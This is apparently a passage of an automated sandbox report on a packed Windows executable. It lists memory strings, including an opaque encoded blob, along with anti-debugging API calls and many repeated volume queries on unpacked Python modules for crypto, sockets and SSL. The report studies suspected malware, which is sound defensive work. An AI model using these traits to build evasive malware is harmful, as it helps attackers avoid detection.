Source: 4Vp6Xc8SFr.exe, 00000001.00000003.313746956.0000017AC9FE5000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.308139438.0000017AC9FE5000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.315053090.0000017AC9FE8000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.310101800.0000017AC9FE5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: pFJs3VDcHt5Zy0AzvPmk9VEvdFuDYjv5kWm4qr6AaxUEzYcZjPl0mUidilnhGLFYZ3CT0v4A6W4BybOMnyJsXgyZDEBms6nxmAmqFASb2a9cniFd1WShAuTwy4azZ2s7TEdmMYHqp3Q1qriAFImdAb1wPj0LK+XKeiS7aaYX8fxpchpGLJGHWazeezetpfT0VpJr1Q64QgHcMbnwZFQ23TTPL8ycERvYa+v2DGlUmLdRcUa8JvlNv5MnW63qrAoY3MIz4XFdquCuB2O8Saf5uD5XB2XhlSnr7sk3grNdoMQC7oFCiSCM8L5RJ4SH80ehgFST82YbagYP/3soq5XCV103AABO8GWOM9jzUG9pqQ65IP5GPRDu23FkMjK3Gf1kr3Gpm7V9YaGVWMT3DkRpma9uAKjugadVJIYOFY1y+6YRFe2KQ0yHIM1qIYj7zj0oSZW5Slt2VgQs8hx01yo6lDVFhiRuON0sQwcb2qNRei3qWLNNFuLdVjjUrzAJ0FHvbwSyBCVdgqWL7Ek2ZfQH2majYYubCIrUCQ2I0bzay8s4kA+AcPNbK6MV3HX0LSc5ymtbjTaw[
Source: 4Vp6Xc8SFr.exe, 00000001.00000003.314933646.0000017AC9A38000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.314799373.0000017AC9A30000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.314742750.0000017AC9A23000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWefer%SystemRoot%\system32\mswsock.dllnsock.dll version out of range.

Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe

Code function: 0_2_00007FF7DA8E9A34 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00007FF7DA8E9A34

Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe

Code function: 0_2_00007FF7DA8F24F0 GetProcessHeap,

0_2_00007FF7DA8F24F0

Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 0_2_00007FF7DA8DAE40 SetUnhandledExceptionFilter,_invalid_parameter_noinfo,	0_2_00007FF7DA8DAE40
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 0_2_00007FF7DA8E9A34 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF7DA8E9A34
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 0_2_00007FF7DA8DAFE4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00007FF7DA8DAFE4
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 0_2_00007FF7DA8DB7E0 SetUnhandledExceptionFilter,	0_2_00007FF7DA8DB7E0
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 0_2_00007FF7DA8DB5FC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF7DA8DB5FC
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FF7DA8DAE40 SetUnhandledExceptionFilter,_invalid_parameter_noinfo,	1_2_00007FF7DA8DAE40
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FF7DA8E9A34 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00007FF7DA8E9A34
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FF7DA8DAFE4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_00007FF7DA8DAFE4
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FF7DA8DB7E0 SetUnhandledExceptionFilter,	1_2_00007FF7DA8DB7E0
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FF7DA8DB5FC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00007FF7DA8DB5FC
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FFCFD7430E8 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00007FFCFD7430E8
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Code function: 1_2_00007FFCFD742B20 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_00007FFCFD742B20

Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe

Process created: C:\Users\user\Desktop\4Vp6Xc8SFr.exe C:\Users\user\Desktop\4Vp6Xc8SFr.exe

Jump to behavior

Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Cipher VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Hash VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\PublicKey VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Util VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\certifi VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\ucrtbase.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\_ctypes.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\_bz2.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\_lzma.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\_sqlite3.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\_hashlib.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\_socket.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\select.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\Desktop\4Vp6Xc8SFr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\_ssl.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52202\base_library.zip VolumeInformation	Jump to behavior
